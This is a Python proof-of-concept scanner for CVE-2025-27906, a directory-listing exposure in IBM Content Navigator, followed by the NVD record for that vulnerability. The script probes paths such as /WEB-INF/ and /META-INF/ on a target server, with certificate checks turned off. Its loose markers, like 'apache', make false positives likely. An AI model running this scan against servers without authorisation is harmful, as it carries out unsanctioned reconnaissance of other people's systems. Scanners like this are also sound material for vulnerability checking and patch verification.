CVE-2025-27906

# CVE-2025-27906 PoC - IBM Content Navigator Directory Listing Exposure # This PoC demonstrates how to detect directory listing exposure in IBM Content Navigator import requests import sys from urllib.parse import urljoin def check_directory_listing(base_url, paths): """ Check if directory listing is enabled on the target IBM Content Navigator server. Args: base_url: The base URL of the target application paths: List of directory paths to check Returns: List of vulnerable paths """ vulnerable_paths = [] # Common directory listing indicators in HTML response indicators = [ "Index of /", "Directory Listing", "Parent Directory", "<title>Index of", "apache", "tomcat" ] for path in paths: target_url = urljoin(base_url, path) try: response = requests.get(target_url, timeout=10, verify=False) # Check if the response contains directory listing indicators for indicator in indicators: if indicator.lower() in response.text.lower(): print(f"[+] VULNERABLE: Directory listing found at {target_url}") vulnerable_paths.append(target_url) break else: print(f"[-] Not vulnerable: {target_url}") except requests.exceptions.RequestException as e: print(f"[!] Error accessing {target_url}: {e}") return vulnerable_paths def main(): if len(sys.argv) < 2: print(f"Usage: python {sys.argv[0]} <target_url>") print(f"Example: python {sys.argv[0]} https://target-server/icn") sys.exit(1) base_url = sys.argv[1] # Common paths to check in IBM Content Navigator paths_to_check = [ "/", "/WEB-INF/", "/META-INF/", "/config/", "/documents/", "/templates/", "/navigator/", "/plugin/", "/lib/", "/css/", "/js/", "/images/", "/WEB-INF/classes/", "/WEB-INF/lib/" ] print(f"[*] Checking directory listing on {base_url}") print(f"[*] CVE-2025-27906 - IBM Content Navigator Directory Listing Exposure") print("-" * 60) vulnerable = check_directory_listing(base_url, paths_to_check) print("-" * 60) if vulnerable: print(f"[+] Found {len(vulnerable)} vulnerable paths:") for url in vulnerable: print(f" - {url}") print("\n[!] Recommendation: Apply IBM security patch to fix CVE-2025-27906") else: print("[-] No directory listing vulnerabilities found.") if __name__ == "__main__": main() # Example usage: # python poc.py https://vulnerable-icn-server.example.com/icn # # Expected output for vulnerable server: # [+] VULNERABLE: Directory listing found at https://vulnerable-icn-server.example.com/icn/WEB-INF/

{"cve": {"id": "CVE-2025-27906", "sourceIdentifier": "[email protected]", "published": "2025-10-14T15:16:08.483", "lastModified": "2025-10-21T14:31:09.300", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Content Navigator 3.0.11, 3.0.15, 3.1.0, and 3.2.0 could expose the directory listing of the application upon using an application URL. Application files and folders are visible in the browser to a user; however, the contents of the files cannot be read obtained or modified."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-548"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:content_navigator:3.0.11:-:*:*:*:*:*:*", "matchCriteriaId": "3E22B540-6596-4B59-A703-4BFD89946F8C"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:content_navigator:3.0.15:-:*:*:*:*:*:*", "matchCriteriaId": "970464FB-088C-4325-8172-39DEC02B9AF3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:content_navigator:3.1.0:-:*:*:*:*:*:*", "matchCriteriaId": "AF91A6FA-A5E4-4C15-AA11-A4D1CFBAF440"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:content_navigator:3.2.0:-:*:*:*:*:*:*", "matchCriteriaId": "9EF33918-7F0E-4034-91F4-950D5D030FD3"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7247854", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}